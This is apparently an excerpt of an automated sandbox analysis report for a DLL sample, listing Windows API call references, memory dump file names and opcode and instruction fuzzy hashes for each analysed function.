                                                                • GetLastError.KERNEL32 ref: 001697DF
                                                                • GetLastError.KERNEL32 ref: 001697FE
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$FileHandleRead
                                                                • String ID:
                                                                • API String ID: 2244327787-0
                                                                • Opcode ID: b831d70e701f794b3a5c597a59ff35f77d5937df2a85a866a48dcb54ab64ed9e
                                                                • Instruction ID: d6381bb91f6f1ad6bffc93cfc358be43c02d03be556fa4df523f5baed51ca52e
                                                                • Opcode Fuzzy Hash: b831d70e701f794b3a5c597a59ff35f77d5937df2a85a866a48dcb54ab64ed9e
                                                                • Instruction Fuzzy Hash: DF11C431910208EBDF205F64CC04A7977ADFB52765F10892AF426C7590D774DEA4DF61
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00183F73,00000000,00000000,?,0018ACDB,00183F73,00000000,00000000,00000000,?,0018AED8,00000006,FlsSetValue), ref: 0018AD66
                                                                • GetLastError.KERNEL32(?,0018ACDB,00183F73,00000000,00000000,00000000,?,0018AED8,00000006,FlsSetValue,00197970,FlsSetValue,00000000,00000364,?,001898B7), ref: 0018AD72
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0018ACDB,00183F73,00000000,00000000,00000000,?,0018AED8,00000006,FlsSetValue,00197970,FlsSetValue,00000000), ref: 0018AD80
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 2c140f2e2027b8f9a0ec4a3c5568943866dd6f1099df7f38700a50b7a1e9f5b5
                                                                • Instruction ID: f4dd05bd2ed7599de1695aff58d9466c766001db245549d4e468ce8e11ff472c
                                                                • Opcode Fuzzy Hash: 2c140f2e2027b8f9a0ec4a3c5568943866dd6f1099df7f38700a50b7a1e9f5b5
                                                                • Instruction Fuzzy Hash: FD014736201222ABD7215BA89C44A577B98EF007A27550722F916D3950C720DE41CFE1
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0016D343,00000001,?,?,?,00000000,0017551D,?,?,?), ref: 00169F9E
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0017551D,?,?,?,?,?,00174FC7,?), ref: 00169FE5
                                                                • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0016D343,00000001,?,?), ref: 0016A011
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$Handle
                                                                • String ID:
                                                                • API String ID: 4209713984-0
                                                                • Opcode ID: fa2527b7d9b658d5be18ed02ca1f4138903473da57e1ef597a8731634fb879ab
                                                                • Instruction ID: 767060194b511d6edce8d19c19d19c6aeefba5f62b687b824283fc7432e9aeef
                                                                • Opcode Fuzzy Hash: fa2527b7d9b658d5be18ed02ca1f4138903473da57e1ef597a8731634fb879ab
                                                                • Instruction Fuzzy Hash: 72319131208305AFDB14CF20DD18B6E7BA9FF84715F054A1DF991AB290C775AD98CBA2
                                                                APIs
                                                                  • Part of subcall function 0016C27E: _wcslen.LIBCMT ref: 0016C284
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A2D9
                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A30C
                                                                • GetLastError.KERNEL32(?,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A329
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$ErrorLast_wcslen
                                                                • String ID:
                                                                • API String ID: 2260680371-0
                                                                • Opcode ID: f84f530e53ab76ceeeee4317760c6ef2ec387f0dba208a92c63b6450ed2c508a
                                                                • Instruction ID: 17eab5e0dd1e0fa5e8497775145e941ff120cb6eb566c3d1b5a6efea1a42da0a
                                                                • Opcode Fuzzy Hash: f84f530e53ab76ceeeee4317760c6ef2ec387f0dba208a92c63b6450ed2c508a
                                                                • Instruction Fuzzy Hash: 1701FC351002106AEF21AF754C49BFD7398BF19781F884419F901F6191D754CAE1CEB3
                                                                APIs
                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0018B8B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Info
                                                                • String ID:
                                                                • API String ID: 1807457897-3916222277
                                                                • Opcode ID: b2b50703dfc8e28a129847878120b4e48a61e1f79a4ff31f35f505bb1e83b727
                                                                • Instruction ID: 3e136f2fe79298d3cc577cfd46be5c34452a5d86ac618c4f15f4caf4660d10e1
                                                                • Opcode Fuzzy Hash: b2b50703dfc8e28a129847878120b4e48a61e1f79a4ff31f35f505bb1e83b727
                                                                • Instruction Fuzzy Hash: 8741F6B090828C9BDF259E64CCD4BF6BBADEB55308F1404EDE69A87142D335AB458F60
                                                                APIs
                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0018AFDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: String
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2568140703-3893581201
                                                                • Opcode ID: a84e90534921bb3cae3c8cc34a25a8e16d36494585f891789426a657edbde2ae
                                                                • Instruction ID: 040b7bd8dabb76b3652e8b8e536599d234a110ccedfb892f4077089b9e5bfb19
                                                                • Opcode Fuzzy Hash: a84e90534921bb3cae3c8cc34a25a8e16d36494585f891789426a657edbde2ae
                                                                • Instruction Fuzzy Hash: FF012532504209BBCF02AF90DC02DEE7F66EF08764F454156FE1826160CB328A71AF81
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0018A56F), ref: 0018AF55
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                • String ID: InitializeCriticalSectionEx
                                                                • API String ID: 2593887523-3084827643
                                                                • Opcode ID: 517c8f231daf2cdf28c98582197e70b3598d8a2941ceaa7102c36bd297b99381
                                                                • Instruction ID: b4c1b7fa3c085d4d327782c981de9a59aa922537f80e5c3bb1b7589b35d8fd3e
                                                                • Opcode Fuzzy Hash: 517c8f231daf2cdf28c98582197e70b3598d8a2941ceaa7102c36bd297b99381
                                                                • Instruction Fuzzy Hash: 6FF0B431645208BBCF166F51CC02C9E7F61EF14721B804066FD1956260DB715F109B8A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Alloc
                                                                • String ID: FlsAlloc
                                                                • API String ID: 2773662609-671089009
                                                                • Opcode ID: ae6a2926ac088fb9c3a8e8bc82953ee844b610070bb24d720b68f13f5f284d1c
                                                                • Instruction ID: 3edce30508121a10c35b9a0b507d8a3717dcec9dc0a0b5abebca14a384a2ef99
                                                                • Opcode Fuzzy Hash: ae6a2926ac088fb9c3a8e8bc82953ee844b610070bb24d720b68f13f5f284d1c
                                                                • Instruction Fuzzy Hash: 70E0E5316452187BDA15ABA5DC0296EBB94DF14B31B4101ABF805A7290DF705F418BDA
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017EAF9
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID: 3Ro
                                                                • API String ID: 1269201914-1492261280
                                                                • Opcode ID: 26b0d48b1ddfd46e4b142a424aa59f4d680262bc1b1d5fcfe69421167b374be7
                                                                • Instruction ID: 603fd856ef4440424956e22f27cc28546c59a66418f9e19108b46044a51d9674
                                                                • Opcode Fuzzy Hash: 26b0d48b1ddfd46e4b142a424aa59f4d680262bc1b1d5fcfe69421167b374be7
                                                                • Instruction Fuzzy Hash: C8B012D76DA0427C370862001E02D3702FCC0E4F90330C06EF528D40C1DF808C010472
                                                                APIs
                                                                  • Part of subcall function 0018B7BB: GetOEMCP.KERNEL32(00000000,?,?,0018BA44,?), ref: 0018B7E6
                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0018BA89,?,00000000), ref: 0018BC64
                                                                • GetCPInfo.KERNEL32(00000000,0018BA89,?,?,?,0018BA89,?,00000000), ref: 0018BC77
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CodeInfoPageValid
                                                                • String ID:
                                                                • API String ID: 546120528-0
                                                                • Opcode ID: 1fce963b99f4335633135461c5b881349e07dc1a3f0f4b54f1a49f82b0d87373
                                                                • Instruction ID: f49aa950e782b641ad8c9753f6253b934e776602dbb1027fef3c351cc2467577
                                                                • Opcode Fuzzy Hash: 1fce963b99f4335633135461c5b881349e07dc1a3f0f4b54f1a49f82b0d87373
                                                                • Instruction Fuzzy Hash: F2513570908245AFDB24EFB1C8D16BBBBE4EF51308F18416ED4968B251D7359B468F90
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00169A50,?,?,00000000,?,?,00168CBC,?), ref: 00169BAB
                                                                • GetLastError.KERNEL32(?,00000000,00168411,-00009570,00000000,000007F3), ref: 00169BB6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                • API String ID: 2976181284-0
                                                                • Opcode ID: 819b7f25033e19c346393f78f4eeaa4fb72668adf4e773bd790498e7d88713e9
                                                                • Instruction ID: d7641ac594c3fefa9006f4d94b22015b4e6c9c61d8cba382173f51f302bae5d3
                                                                • Opcode Fuzzy Hash: 819b7f25033e19c346393f78f4eeaa4fb72668adf4e773bd790498e7d88713e9
                                                                • Instruction Fuzzy Hash: 3041DD316043418FDB24DF29ED8486AB7EDFFE9320F158A2EE89183260D770ED558B91
                                                                APIs
                                                                  • Part of subcall function 001897E5: GetLastError.KERNEL32(?,001A1030,00184674,001A1030,?,?,00183F73,00000050,?,001A1030,00000200), ref: 001897E9
                                                                  • Part of subcall function 001897E5: _free.LIBCMT ref: 0018981C
                                                                  • Part of subcall function 001897E5: SetLastError.KERNEL32(00000000,?,001A1030,00000200), ref: 0018985D
                                                                  • Part of subcall function 001897E5: _abort.LIBCMT ref: 00189863
                                                                  • Part of subcall function 0018BB4E: _abort.LIBCMT ref: 0018BB80
                                                                  • Part of subcall function 0018BB4E: _free.LIBCMT ref: 0018BBB4
                                                                  • Part of subcall function 0018B7BB: GetOEMCP.KERNEL32(00000000,?,?,0018BA44,?), ref: 0018B7E6
                                                                • _free.LIBCMT ref: 0018BA9F
                                                                • _free.LIBCMT ref: 0018BAD5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast_abort
                                                                • String ID:
                                                                • API String ID: 2991157371-0
                                                                • Opcode ID: 0772bc0b0f68cba16afefe919ac6b52b6111a33d0dff9de67e3f823f5aa9f6b5
                                                                • Instruction ID: c272f1b1602b7f7c79580c46b84a1e712b77145d7036dfc5240337c6b2a70ea6
                                                                • Opcode Fuzzy Hash: 0772bc0b0f68cba16afefe919ac6b52b6111a33d0dff9de67e3f823f5aa9f6b5
                                                                • Instruction Fuzzy Hash: 0231D731908209AFDB14FFA8D481BADB7F5EF50324F25409AE9149B2A2EB325F41DF50
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00161E55
                                                                  • Part of subcall function 00163BBA: __EH_prolog.LIBCMT ref: 00163BBF
                                                                • _wcslen.LIBCMT ref: 00161EFD
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog$_wcslen
                                                                • String ID:
                                                                • API String ID: 2838827086-0
                                                                • Opcode ID: e7a83967ec3c57160ed907c18e79fbab09f4a1cfbdef89a7e2a468db359b2c2f
                                                                • Instruction ID: f4efda4aa802a78d0ce8570b005f8e1e5fbc13ca272cb81ab941c5d32595cbe0
                                                                • Opcode Fuzzy Hash: e7a83967ec3c57160ed907c18e79fbab09f4a1cfbdef89a7e2a468db359b2c2f
                                                                • Instruction Fuzzy Hash: 52312B71904209AFCF15DF99C945AEEBBF5AF58300F1440A9F845A7251CB329E25CB60
                                                                APIs
                                                                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001673BC,?,?,?,00000000), ref: 00169DBC
                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00169E70
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$BuffersFlushTime
                                                                • String ID:
                                                                • API String ID: 1392018926-0
                                                                • Opcode ID: ee0ecba30b207f8866e742f4cf5523334fb5eedf55a3e5227133119d791a7bc4
                                                                • Instruction ID: c1c604fc775807caa20aa955226ea394e9af1721766feb4fb6e9ff35f0a42a50
                                                                • Opcode Fuzzy Hash: ee0ecba30b207f8866e742f4cf5523334fb5eedf55a3e5227133119d791a7bc4
                                                                • Instruction Fuzzy Hash: 1A21E131248286EFC714CF78C891AABBBE8AF55704F08492DF8D587541D339E92DDB61
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00169F27,?,?,0016771A), ref: 001696E6
                                                                • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00169F27,?,?,0016771A), ref: 00169716
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 84cabc68ef95e45dea998823cb27749fc4a833d28c3bb16e69d3ee822891306a
                                                                • Instruction ID: 8cd91ec41ff3ddd3814dac7d13fc020ef6d1be844011b470bdb6a2b981f482f9
                                                                • Opcode Fuzzy Hash: 84cabc68ef95e45dea998823cb27749fc4a833d28c3bb16e69d3ee822891306a
                                                                • Instruction Fuzzy Hash: 5621DEB1504344AFE3308A65CC89FF7B7ECEB59324F144A19FAD6C25D1C7B8A8849A71
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00169EC7
                                                                • GetLastError.KERNEL32 ref: 00169ED4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                • API String ID: 2976181284-0
                                                                • Opcode ID: ad964541078468fb0ca6b2b5fe7758f0337624a03e1b077d163180053b5772d7
                                                                • Instruction ID: 5add6519bdeec184ff7142cbfc34d533206228378d8f50e5b3dda2701bc45716
                                                                • Opcode Fuzzy Hash: ad964541078468fb0ca6b2b5fe7758f0337624a03e1b077d163180053b5772d7
                                                                • Instruction Fuzzy Hash: 69110430600700ABD738C628CC80BB6B7EDAB45370F604A2AF563D2AD0D772ED99C760
                                                                APIs
                                                                • _free.LIBCMT ref: 00188E75
                                                                  • Part of subcall function 00188E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018CA2C,00000000,?,00186CBE,?,00000008,?,001891E0,?,?,?), ref: 00188E38
